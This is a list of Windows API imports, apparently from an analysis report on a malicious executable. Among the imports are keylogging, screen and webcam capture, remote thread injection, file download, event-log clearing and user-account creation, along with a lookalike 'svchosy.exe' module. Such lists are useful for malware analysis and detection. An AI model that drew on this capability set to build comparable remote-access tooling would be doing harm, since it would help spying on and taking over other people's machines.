  • kernel32.dll.GetStartupInfoA
  • kernel32.dll.RtlUnwind
  • kernel32.dll.TerminateProcess
  • kernel32.dll.RaiseException
  • kernel32.dll.GetSystemTime
  • kernel32.dll.GetLocalTime
  • kernel32.dll.GetACP
  • kernel32.dll.HeapSize
  • kernel32.dll.SetStdHandle
  • kernel32.dll.GetFileType
  • kernel32.dll.UnhandledExceptionFilter
  • kernel32.dll.FreeEnvironmentStringsA
  • kernel32.dll.FreeEnvironmentStringsW
  • kernel32.dll.GetEnvironmentStrings
  • kernel32.dll.GetEnvironmentStringsW
  • kernel32.dll.SetHandleCount
  • kernel32.dll.GetStdHandle
  • kernel32.dll.GetEnvironmentVariableA
  • kernel32.dll.GetVersionExA
  • kernel32.dll.HeapDestroy
  • kernel32.dll.HeapCreate
  • kernel32.dll.VirtualFree
  • kernel32.dll.LCMapStringA
  • kernel32.dll.LCMapStringW
  • kernel32.dll.VirtualAlloc
  • kernel32.dll.IsBadWritePtr
  • kernel32.dll.SetUnhandledExceptionFilter
  • kernel32.dll.GetStringTypeA
  • kernel32.dll.GetStringTypeW
  • kernel32.dll.IsBadCodePtr
  • kernel32.dll.CompareStringA
  • kernel32.dll.CompareStringW
  • kernel32.dll.SetEnvironmentVariableA
  • kernel32.dll.ExitProcess
  • kernel32.dll.GetModuleHandleA
  • kernel32.dll.FreeLibrary
  • kernel32.dll.GetProcessHeap
  • advapi32.dll.RegSetValueExA
  • advapi32.dll.RegOpenKeyExA
  • advapi32.dll.RegCreateKeyExA
  • comctl32.dll.#17
  • gdi32.dll.GetObjectA
  • gdi32.dll.GetStockObject
  • gdi32.dll.GetDeviceCaps
  • gdi32.dll.SetBkColor
  • gdi32.dll.SelectObject
  • gdi32.dll.RestoreDC
  • gdi32.dll.SaveDC
  • gdi32.dll.CreateBitmap
  • gdi32.dll.DeleteDC
  • gdi32.dll.DeleteObject
  • gdi32.dll.Escape
  • gdi32.dll.ExtTextOutA
  • gdi32.dll.TextOutA
  • gdi32.dll.RectVisible
  • gdi32.dll.PtVisible
  • gdi32.dll.GetClipBox
  • gdi32.dll.ScaleWindowExtEx
  • gdi32.dll.SetWindowExtEx
  • gdi32.dll.ScaleViewportExtEx
  • gdi32.dll.SetViewportExtEx
  • gdi32.dll.OffsetViewportOrgEx
  • gdi32.dll.SetViewportOrgEx
  • gdi32.dll.SetMapMode
  • gdi32.dll.SetTextColor
  • rasapi32.dll.RasHangUpA
  • rasapi32.dll.RasGetConnectStatusA
  • user32.dll.UnhookWindowsHookEx
  • user32.dll.GetMenuItemCount
  • user32.dll.GetDC
  • user32.dll.ReleaseDC
  • user32.dll.TabbedTextOutA
  • user32.dll.DrawTextA
  • user32.dll.GrayStringA
  • user32.dll.GetDlgItem
  • user32.dll.SetWindowLongA
  • user32.dll.SetWindowPos
  • user32.dll.ShowWindow
  • user32.dll.SetFocus
  • user32.dll.GetWindowPlacement
  • user32.dll.IsIconic
  • user32.dll.SystemParametersInfoA
  • user32.dll.RegisterWindowMessageA
  • user32.dll.SetForegroundWindow
  • user32.dll.GetForegroundWindow
  • user32.dll.GetMessagePos
  • user32.dll.GetMessageTime
  • user32.dll.DefWindowProcA
  • user32.dll.RemovePropA
  • user32.dll.CallWindowProcA
  • user32.dll.GetPropA
  • user32.dll.GetWindowRect
  • user32.dll.GetClassLongA
  • user32.dll.CreateWindowExA
  • user32.dll.DestroyWindow
  • user32.dll.GetMenuItemID
  • user32.dll.GetSubMenu
  • user32.dll.GetMenu
  • user32.dll.RegisterClassA
  • user32.dll.GetClassInfoA
  • user32.dll.WinHelpA
  • user32.dll.GetCapture
  • user32.dll.GetTopWindow
  • user32.dll.ClientToScreen
  • user32.dll.CopyRect
  • user32.dll.GetClientRect
  • user32.dll.AdjustWindowRectEx
  • user32.dll.GetSysColor
  • user32.dll.MapWindowPoints
  • user32.dll.LoadIconA
  • user32.dll.LoadCursorA
  • user32.dll.GetSysColorBrush
  • user32.dll.LoadStringA
  • user32.dll.DestroyMenu
  • user32.dll.SetWindowTextA
  • user32.dll.PtInRect
  • user32.dll.GetClassNameA
  • user32.dll.GetWindowTextA
  • user32.dll.GetMenuCheckMarkDimensions
  • user32.dll.LoadBitmapA
  • user32.dll.GetMenuState
  • user32.dll.ModifyMenuA
  • user32.dll.SetMenuItemBitmaps
  • user32.dll.CheckMenuItem
  • user32.dll.EnableMenuItem
  • user32.dll.GetFocus
  • user32.dll.GetNextDlgTabItem
  • user32.dll.GetActiveWindow
  • user32.dll.GetKeyState
  • user32.dll.CallNextHookEx
  • user32.dll.ValidateRect
  • user32.dll.IsWindowVisible
  • user32.dll.GetCursorPos
  • user32.dll.SetWindowsHookExA
  • user32.dll.GetParent
  • user32.dll.GetLastActivePopup
  • user32.dll.IsWindowEnabled
  • user32.dll.GetWindow
  • user32.dll.GetDlgCtrlID
  • user32.dll.GetWindowLongA
  • user32.dll.EnableWindow
  • user32.dll.SetCursor
  • user32.dll.SendMessageA
  • user32.dll.PostMessageA
  • user32.dll.SetPropA
  • user32.dll.PeekMessageA
  • user32.dll.GetMessageA
  • user32.dll.TranslateMessage
  • user32.dll.DispatchMessageA
  • user32.dll.wsprintfA
  • user32.dll.MessageBoxA
  • user32.dll.PostQuitMessage
  • user32.dll.UnregisterClassA
  • wininet.dll.InternetCanonicalizeUrlA
  • wininet.dll.InternetCrackUrlA
  • wininet.dll.HttpOpenRequestA
  • wininet.dll.HttpSendRequestA
  • wininet.dll.HttpQueryInfoA
  • wininet.dll.InternetReadFile
  • wininet.dll.InternetConnectA
  • wininet.dll.InternetSetOptionA
  • wininet.dll.InternetCloseHandle
  • wininet.dll.InternetOpenA
  • winspool.drv.ClosePrinter
  • winspool.drv.OpenPrinterA
  • winspool.drv.DocumentPropertiesA
  • wsock32.dll.#115
  • wsock32.dll.#116
  • wsock32.dll.#18
  • wsock32.dll.#16
  • wsock32.dll.#19
  • wsock32.dll.#3
  • kernel32.dll.VirtualProtect
  • kernel32.dll.Process32Next
  • kernel32.dll.lstrcpyn
  • kernel32.dll.RtlMoveMemory
  • kernel32.dll.CreateToolhelp32Snapshot
  • kernel32.dll.CreateProcessA
  • kernel32.dll.UnmapViewOfFile
  • kernel32.dll.Module32First
  • kernel32.dll.Process32First
  • kernel32.dll.MapViewOfFile
  • kernel32.dll.CreateFileMappingA
  • advapi32.dll.LookupPrivilegeValueA
  • advapi32.dll.AdjustTokenPrivileges
  • advapi32.dll.OpenProcessToken
  • msvcrt.dll.calloc
  • msvcrt.dll.sprintf
  • msvcrt.dll.free
  • msvcrt.dll.malloc
  • msvcrt.dll.strrchr
  • msvcrt.dll._ftol
  • msvcrt.dll.strchr
  • msvcrt.dll.atoi
  • msvcrt.dll.realloc
  • msvcrt.dll.modf
  • rpcrt4.dll.RpcBindingFree
  • kernel32.dll.ExpandEnvironmentStringsA
  • kernel32.dll.OutputDebugStringA
  • mfc42.dll.#823
  • msvcrt.dll.fclose
  • msvcrt.dll.fopen
  • msvcrt.dll._exit
  • msvcrt.dll._XcptFilter
  • msvcrt.dll._acmdln
  • msvcrt.dll.__getmainargs
  • msvcrt.dll._initterm
  • msvcrt.dll.__setusermatherr
  • msvcrt.dll._adjust_fdiv
  • msvcrt.dll.__p__commode
  • msvcrt.dll.__p__fmode
  • msvcrt.dll.__set_app_type
  • msvcrt.dll._except_handler3
  • msvcrt.dll._controlfp
  • msvcrt.dll.exit
  • shlwapi.dll.PathFindFileNameA
  • shlwapi.dll.PathGetArgsA
  • shlwapi.dll.PathUnquoteSpacesA
  • shlwapi.dll.PathRemoveArgsA
  • mfc42.dll.#5572
  • mfc42.dll.#5442
  • mfc42.dll.#4204
  • mfc42.dll.#665
  • mfc42.dll.#5186
  • mfc42.dll.#354
  • mfc42.dll.#825
  • mfc42.dll.#800
  • mfc42.dll.#941
  • mfc42.dll.#940
  • mfc42.dll.#860
  • mfc42.dll.#540
  • mfc42.dll.#690
  • mfc42.dll.#2915
  • mfc42.dll.#5207
  • mfc42.dll.#389
  • mfc42.dll.#537
  • mfc42.dll.#2818
  • mfc42.dll.#3811
  • mfc42.dll.#2614
  • mfc42.dll.#801
  • mfc42.dll.#541
  • mfc42.dll.#668
  • mfc42.dll.#6883
  • mfc42.dll.#3181
  • mfc42.dll.#3304
  • mfc42.dll.#3010
  • mfc42.dll.#3310
  • mfc42.dll.#3324
  • mfc42.dll.#4215
  • mfc42.dll.#1980
  • mfc42.dll.#3178
  • mfc42.dll.#4058
  • mfc42.dll.#2781
  • mfc42.dll.#2770
  • mfc42.dll.#922
  • mfc42.dll.#858
  • mfc42.dll.#356
  • mfc42.dll.#1979
  • mfc42.dll.#6394
  • mfc42.dll.#5450
  • mfc42.dll.#2764
  • mfc42.dll.#6383
  • mfc42.dll.#5440
  • mfc42.dll.#6283
  • mfc42.dll.#2784
  • mfc42.dll.#4129
  • mfc42.dll.#6662
  • mfc42.dll.#4278
  • mfc42.dll.#2763
  • mfc42.dll.#6282
  • mfc42.dll.#6143
  • mfc42.dll.#3663
  • mfc42.dll.#6876
  • mfc42.dll.#939
  • mfc42.dll.#5710
  • mfc42.dll.#535
  • mfc42.dll.#536
  • mfc42.dll.#6874
  • msvcrt.dll._strnicmp
  • msvcrt.dll.__CxxFrameHandler
  • msvcrt.dll.memmove
  • msvcrt.dll.ceil
  • msvcrt.dll.strstr
  • msvcrt.dll._mbsicmp
  • msvcrt.dll._mbscmp
  • msvcrt.dll._access
  • msvcrt.dll.strncmp
  • msvcrt.dll._mbslwr
  • msvcrt.dll.wcsstr
  • msvcrt.dll._mbsstr
  • msvcrt.dll.strncat
  • msvcrt.dll.strncpy
  • msvcrt.dll._errno
  • msvcrt.dll.mbstowcs
  • msvcrt.dll.wcslen
  • msvcrt.dll.wcstombs
  • msvcrt.dll.wcscpy
  • msvcrt.dll.atol
  • msvcrt.dll.getchar
  • msvcrt.dll._strupr
  • msvcrt.dll._beginthreadex
  • msvcrt.dll._snprintf
  • msvcrt.dll._splitpath
  • msvcrt.dll._wcsupr
  • kernel32.dll.DisableThreadLibraryCalls
  • kernel32.dll.SystemTimeToTzSpecificLocalTime
  • kernel32.dll.GetPrivateProfileStringA
  • kernel32.dll.GetComputerNameA
  • kernel32.dll.GlobalMemoryStatus
  • kernel32.dll.CreateRemoteThread
  • kernel32.dll.Module32Next
  • kernel32.dll.WinExec
  • kernel32.dll.lstrcpyW
  • kernel32.dll.CreateThread
  • kernel32.dll.GlobalSize
  • kernel32.dll.GetSystemDirectoryA
  • kernel32.dll.ResumeThread
  • kernel32.dll.TerminateThread
  • kernel32.dll.Beep
  • kernel32.dll.DeviceIoControl
  • kernel32.dll.GetFileAttributesExA
  • kernel32.dll.FileTimeToSystemTime
  • kernel32.dll.FindFirstFileA
  • kernel32.dll.GetLogicalDriveStringsA
  • kernel32.dll.GetVolumeInformationA
  • kernel32.dll.LocalSize
  • kernel32.dll.GetWindowsDirectoryA
  • kernel32.dll.ReadFile
  • kernel32.dll.CopyFileA
  • kernel32.dll.CreateEventA
  • kernel32.dll.ResetEvent
  • kernel32.dll.SetEvent
  • kernel32.dll.InterlockedExchange
  • kernel32.dll.CancelIo
  • kernel32.dll.LoadLibraryW
  • kernel32.dll.GetDiskFreeSpaceExA
  • kernel32.dll.GetDriveTypeA
  • kernel32.dll.GlobalMemoryStatusEx
  • kernel32.dll.GetSystemInfo
  • kernel32.dll.GetFileSize
  • kernel32.dll.FindClose
  • kernel32.dll.FindNextFileA
  • kernel32.dll.DeleteFileA
  • kernel32.dll.RemoveDirectoryA
  • kernel32.dll.SetFileAttributesA
  • kernel32.dll.GetFileAttributesA
  • kernel32.dll.CreateMutexA
  • kernel32.dll.SetThreadPriority
  • kernel32.dll.SetPriorityClass
  • kernel32.dll.GetShortPathNameA
  • kernel32.dll.MoveFileExA
  • kernel32.dll.OpenProcess
  • user32.dll.keybd_event
  • user32.dll.BlockInput
  • user32.dll.DestroyCursor
  • user32.dll.GetAsyncKeyState
  • user32.dll.FindWindowA
  • user32.dll.MoveWindow
  • user32.dll.SwapMouseButton
  • user32.dll.ExitWindowsEx
  • user32.dll.EnumWindows
  • user32.dll.CharNextA
  • user32.dll.PostThreadMessageA
  • user32.dll.GetInputState
  • user32.dll.EndDialog
  • user32.dll.CreateDialogParamA
  • user32.dll.UpdateWindow
  • user32.dll.MapVirtualKeyA
  • user32.dll.SetCapture
  • user32.dll.WindowFromPoint
  • user32.dll.SetCursorPos
  • user32.dll.mouse_event
  • user32.dll.CloseClipboard
  • user32.dll.OpenInputDesktop
  • user32.dll.CloseDesktop
  • user32.dll.GetThreadDesktop
  • user32.dll.GetUserObjectInformationA
  • user32.dll.SetClipboardData
  • user32.dll.EmptyClipboard
  • user32.dll.SetThreadDesktop
  • user32.dll.GetWindowThreadProcessId
  • user32.dll.GetCursorInfo
  • user32.dll.GetDesktopWindow
  • user32.dll.SetRect
  • user32.dll.GetClipboardData
  • user32.dll.OpenClipboard
  • user32.dll.SetDlgItemTextA
  • user32.dll.GetDlgItemTextA
  • gdi32.dll.CreateCompatibleBitmap
  • gdi32.dll.GetDIBits
  • gdi32.dll.BitBlt
  • gdi32.dll.CreateCompatibleDC
  • gdi32.dll.CreateDIBSection
  • advapi32.dll.GetTokenInformation
  • advapi32.dll.LookupAccountSidA
  • advapi32.dll.GetUserNameA
  • advapi32.dll.AbortSystemShutdownA
  • advapi32.dll.EnumServicesStatusA
  • advapi32.dll.QueryServiceConfigA
  • advapi32.dll.QueryServiceStatus
  • advapi32.dll.ChangeServiceConfigA
  • advapi32.dll.RegOpenKeyA
  • advapi32.dll.RegQueryValueA
  • advapi32.dll.UnlockServiceDatabase
  • advapi32.dll.ChangeServiceConfig2A
  • advapi32.dll.LockServiceDatabase
  • advapi32.dll.CloseEventLog
  • advapi32.dll.ClearEventLogA
  • advapi32.dll.OpenEventLogA
  • advapi32.dll.RegCreateKeyA
  • advapi32.dll.DeleteService
  • advapi32.dll.RegEnumValueA
  • advapi32.dll.RegEnumKeyExA
  • advapi32.dll.RegDeleteValueA
  • advapi32.dll.RegDeleteKeyA
  • advapi32.dll.RegQueryInfoKeyA
  • shell32.dll.SHChangeNotify
  • shell32.dll.SHGetFileInfoA
  • shell32.dll.ShellExecuteA
  • shell32.dll.ShellExecuteExA
  • shell32.dll.SHGetSpecialFolderPathA
  • ole32.dll.CoInitialize
  • ole32.dll.CoCreateInstance
  • oleaut32.dll.#6
  • urlmon.dll.URLDownloadToFileA
  • winmm.dll.waveInGetNumDevs
  • winmm.dll.mciSendStringA
  • ws2_32.dll.#1
  • ws2_32.dll.#13
  • ws2_32.dll.#20
  • ws2_32.dll.#17
  • ws2_32.dll.#151
  • ws2_32.dll.#10
  • ws2_32.dll.#15
  • ws2_32.dll.#12
  • ws2_32.dll.#5
  • ws2_32.dll.#57
  • ws2_32.dll.#116
  • ws2_32.dll.#19
  • ws2_32.dll.#3
  • ws2_32.dll.#23
  • ws2_32.dll.#9
  • ws2_32.dll.#4
  • ws2_32.dll.#21
  • ws2_32.dll.#2
  • ws2_32.dll.#52
  • ws2_32.dll.#6
  • ws2_32.dll.#11
  • ws2_32.dll.#115
  • ws2_32.dll.#18
  • ws2_32.dll.#16
  • ws2_32.dll.WSAIoctl
  • msvcp60.dll.?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB
  • msvcp60.dll.??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ
  • msvcp60.dll.?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z
  • msvcp60.dll.?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z
  • msvcp60.dll.?_Refcnt@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEAAEPBD@Z
  • msvcp60.dll.?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z
  • msvcp60.dll.?_Split@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ
  • msvcp60.dll.?_Xran@std@@YAXXZ
  • msvcp60.dll.?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB
  • msvcp60.dll.?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z
  • iphlpapi.dll.GetIfTable
  • wtsapi32.dll.WTSEnumerateSessionsA
  • wtsapi32.dll.WTSQuerySessionInformationW
  • wtsapi32.dll.WTSFreeMemory
  • wtsapi32.dll.WTSQuerySessionInformationA
  • wtsapi32.dll.WTSDisconnectSession
  • wtsapi32.dll.WTSLogoffSession
  • netapi32.dll.NetUserGetInfo
  • netapi32.dll.NetUserSetInfo
  • netapi32.dll.NetUserGetLocalGroups
  • netapi32.dll.NetApiBufferFree
  • netapi32.dll.NetLocalGroupAddMembers
  • netapi32.dll.NetUserDel
  • netapi32.dll.NetUserAdd
  • netapi32.dll.NetUserEnum
  • psapi.dll.EnumProcessModules
  • psapi.dll.GetModuleFileNameExA
  • svchosy.exe.Loader
  • kernel32.dll.OpenEventA
  • ntdll.dll.RtlGetNtVersionNumbers
  • wintrust.dll.WinVerifyTrust
  • msdmo.dll.DMOEnum
  • msdmo.dll.DMOGetTypes
  • msdmo.dll.DMOGetName
  • avicap32.dll.capGetDriverDescriptionW
  • kernel32.dll.GetNativeSystemInfo
  • advapi32.dll.StartServiceCtrlDispatcherW